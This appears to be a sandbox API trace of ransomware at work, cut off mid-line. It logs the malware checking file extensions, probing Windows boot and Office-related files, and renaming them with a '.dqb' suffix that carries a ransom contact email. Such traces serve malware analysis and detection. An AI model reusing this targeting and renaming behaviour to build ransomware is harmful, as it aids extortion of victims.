[0269.284] lstrlenW (lpString=".xls") returned 4 [0269.284] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0269.284] lstrlenW (lpString=".xlsx") returned 5 [0269.284] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0269.284] lstrlenW (lpString=".ppt") returned 4 [0269.284] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0269.284] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.284] lstrlenW (lpString=".zip") returned 4 [0269.284] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0269.284] lstrlenW (lpString=".rar") returned 4 [0269.284] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0269.284] lstrlenW (lpString=".bz2") returned 4 [0269.284] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0269.284] lstrlenW (lpString=".7z") returned 3 [0269.284] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0269.284] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.284] lstrlenW (lpString=".dbf") returned 4 [0269.284] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0269.284] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.284] lstrlenW (lpString=".1cd") returned 4 [0269.284] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0269.284] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.284] lstrlenW (lpString=".jpg") returned 4 [0269.284] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0269.284] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.285] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.285] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.285] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=93248) returned 1 [0269.285] CloseHandle (hObject=0x1f0) returned 1 [0269.285] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0269.285] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.285] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.285] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.285] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.285] lstrlenW (lpString=".doc") returned 4 [0269.285] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.285] lstrlenW (lpString=".docx") returned 5 [0269.285] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.285] lstrlenW (lpString=".pdf") returned 4 [0269.285] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.285] lstrlenW (lpString=".xls") returned 4 [0269.285] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.285] lstrlenW (lpString=".xlsx") returned 5 [0269.285] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.285] lstrlenW (lpString=".ppt") returned 4 [0269.285] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.285] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.285] lstrlenW (lpString=".zip") returned 4 [0269.285] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.285] lstrlenW (lpString=".rar") returned 4 [0269.285] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.286] lstrlenW (lpString=".bz2") returned 4 [0269.286] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.286] lstrlenW (lpString=".7z") returned 3 [0269.286] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.286] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.286] lstrlenW (lpString=".dbf") returned 4 [0269.286] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.286] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.286] lstrlenW (lpString=".1cd") returned 4 [0269.286] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.286] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.286] lstrlenW (lpString=".jpg") returned 4 [0269.286] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.286] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.286] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.286] lstrlenW (lpString=".doc") returned 4 [0269.286] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.286] lstrlenW (lpString=".docx") returned 5 [0269.286] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.286] lstrlenW (lpString=".pdf") returned 4 [0269.286] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.286] lstrlenW (lpString=".xls") returned 4 [0269.286] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.286] lstrlenW (lpString=".xlsx") returned 5 [0269.286] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.286] lstrlenW (lpString=".ppt") returned 4 [0269.286] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.286] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.286] lstrlenW (lpString=".zip") returned 4 [0269.286] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.286] lstrlenW (lpString=".rar") returned 4 [0269.286] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.286] lstrlenW (lpString=".bz2") returned 4 [0269.287] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.287] lstrlenW (lpString=".7z") returned 3 [0269.287] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.287] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.287] lstrlenW (lpString=".dbf") returned 4 [0269.287] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.287] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.287] lstrlenW (lpString=".1cd") returned 4 [0269.287] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.287] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0269.287] lstrlenW (lpString=".jpg") returned 4 [0269.287] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.287] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.287] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.287] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.287] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=90688) returned 1 [0269.287] CloseHandle (hObject=0x1f0) returned 1 [0269.287] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0269.287] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.287] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.287] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.287] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString=".doc") returned 4 [0269.288] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.288] lstrlenW (lpString=".docx") returned 5 [0269.288] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.288] lstrlenW (lpString=".pdf") returned 4 [0269.288] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.288] lstrlenW (lpString=".xls") returned 4 [0269.288] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.288] lstrlenW (lpString=".xlsx") returned 5 [0269.288] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.288] lstrlenW (lpString=".ppt") returned 4 [0269.288] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString=".zip") returned 4 [0269.288] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.288] lstrlenW (lpString=".rar") returned 4 [0269.288] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.288] lstrlenW (lpString=".bz2") returned 4 [0269.288] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.288] lstrlenW (lpString=".7z") returned 3 [0269.288] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString=".dbf") returned 4 [0269.288] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString=".1cd") returned 4 [0269.288] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString=".jpg") returned 4 [0269.288] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.288] lstrlenW (lpString=".doc") returned 4 [0269.289] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.289] lstrlenW (lpString=".docx") returned 5 [0269.289] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.289] lstrlenW (lpString=".pdf") returned 4 [0269.289] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.289] lstrlenW (lpString=".xls") returned 4 [0269.289] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.289] lstrlenW (lpString=".xlsx") returned 5 [0269.289] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.289] lstrlenW (lpString=".ppt") returned 4 [0269.289] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.289] lstrlenW (lpString=".zip") returned 4 [0269.289] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.289] lstrlenW (lpString=".rar") returned 4 [0269.289] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.289] lstrlenW (lpString=".bz2") returned 4 [0269.289] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.289] lstrlenW (lpString=".7z") returned 3 [0269.289] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.289] lstrlenW (lpString=".dbf") returned 4 [0269.289] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.289] lstrlenW (lpString=".1cd") returned 4 [0269.289] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0269.289] lstrlenW (lpString=".jpg") returned 4 [0269.289] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.289] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.290] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.290] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.290] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=90704) returned 1 [0269.290] CloseHandle (hObject=0x1f0) returned 1 [0269.290] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0269.290] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.290] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.290] lstrlenW (lpString=".doc") returned 4 [0269.290] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.290] lstrlenW (lpString=".docx") returned 5 [0269.290] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.290] lstrlenW (lpString=".pdf") returned 4 [0269.290] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.290] lstrlenW (lpString=".xls") returned 4 [0269.290] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.290] lstrlenW (lpString=".xlsx") returned 5 [0269.290] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.290] lstrlenW (lpString=".ppt") returned 4 [0269.290] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.290] lstrlenW (lpString=".zip") returned 4 [0269.290] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.290] lstrlenW (lpString=".rar") returned 4 [0269.290] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.290] lstrlenW (lpString=".bz2") returned 4 [0269.291] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.291] lstrlenW (lpString=".7z") returned 3 [0269.291] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.291] lstrlenW (lpString=".dbf") returned 4 [0269.291] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.291] lstrlenW (lpString=".1cd") returned 4 [0269.291] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.291] lstrlenW (lpString=".jpg") returned 4 [0269.291] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.291] lstrlenW (lpString=".doc") returned 4 [0269.291] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.291] lstrlenW (lpString=".docx") returned 5 [0269.291] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.291] lstrlenW (lpString=".pdf") returned 4 [0269.291] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.291] lstrlenW (lpString=".xls") returned 4 [0269.291] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.291] lstrlenW (lpString=".xlsx") returned 5 [0269.291] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.291] lstrlenW (lpString=".ppt") returned 4 [0269.291] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.291] lstrlenW (lpString=".zip") returned 4 [0269.291] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.291] lstrlenW (lpString=".rar") returned 4 [0269.291] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.291] lstrlenW (lpString=".bz2") returned 4 [0269.291] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.291] lstrlenW (lpString=".7z") returned 3 [0269.292] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.292] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.292] lstrlenW (lpString=".dbf") returned 4 [0269.292] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.292] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.292] lstrlenW (lpString=".1cd") returned 4 [0269.292] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.292] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0269.292] lstrlenW (lpString=".jpg") returned 4 [0269.292] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.292] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.292] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.292] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.292] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=76352) returned 1 [0269.292] CloseHandle (hObject=0x1f0) returned 1 [0269.292] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0269.292] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.292] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.292] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.292] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString=".doc") returned 4 [0269.293] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.293] lstrlenW (lpString=".docx") returned 5 [0269.293] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.293] lstrlenW (lpString=".pdf") returned 4 [0269.293] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.293] lstrlenW (lpString=".xls") returned 4 [0269.293] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.293] lstrlenW (lpString=".xlsx") returned 5 [0269.293] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.293] lstrlenW (lpString=".ppt") returned 4 [0269.293] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.293] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString=".zip") returned 4 [0269.293] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.293] lstrlenW (lpString=".rar") returned 4 [0269.293] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.293] lstrlenW (lpString=".bz2") returned 4 [0269.293] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.293] lstrlenW (lpString=".7z") returned 3 [0269.293] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.293] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString=".dbf") returned 4 [0269.293] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.293] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString=".1cd") returned 4 [0269.293] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.293] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString=".jpg") returned 4 [0269.293] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.293] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.293] lstrlenW (lpString=".doc") returned 4 [0269.294] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.294] lstrlenW (lpString=".docx") returned 5 [0269.294] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.294] lstrlenW (lpString=".pdf") returned 4 [0269.294] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.294] lstrlenW (lpString=".xls") returned 4 [0269.294] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.294] lstrlenW (lpString=".xlsx") returned 5 [0269.294] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.294] lstrlenW (lpString=".ppt") returned 4 [0269.294] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.294] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.294] lstrlenW (lpString=".zip") returned 4 [0269.294] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.294] lstrlenW (lpString=".rar") returned 4 [0269.294] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.294] lstrlenW (lpString=".bz2") returned 4 [0269.294] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.294] lstrlenW (lpString=".7z") returned 3 [0269.294] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.294] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.294] lstrlenW (lpString=".dbf") returned 4 [0269.294] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.294] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.294] lstrlenW (lpString=".1cd") returned 4 [0269.294] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.294] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0269.294] lstrlenW (lpString=".jpg") returned 4 [0269.294] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.295] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.295] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.295] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.295] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=75344) returned 1 [0269.295] CloseHandle (hObject=0x1f0) returned 1 [0269.295] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0269.295] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.295] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.295] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0269.295] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0269.295] lstrlenW (lpString=".doc") returned 4 [0269.295] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.295] lstrlenW (lpString=".docx") returned 5 [0269.295] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.295] lstrlenW (lpString=".pdf") returned 4 [0269.295] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.295] lstrlenW (lpString=".xls") returned 4 [0269.295] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.295] lstrlenW (lpString=".xlsx") returned 5 [0269.295] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.295] lstrlenW (lpString=".ppt") returned 4 [0269.295] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.295] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0269.295] lstrlenW (lpString=".zip") returned 4 [0269.295] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.295] lstrlenW (lpString=".rar") returned 4 [0269.295] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.296] lstrlenW (lpString=".bz2") returned 4 [0269.296] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.296] lstrlenW (lpString=".7z") returned 3 [0269.296] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.317] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.326] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft 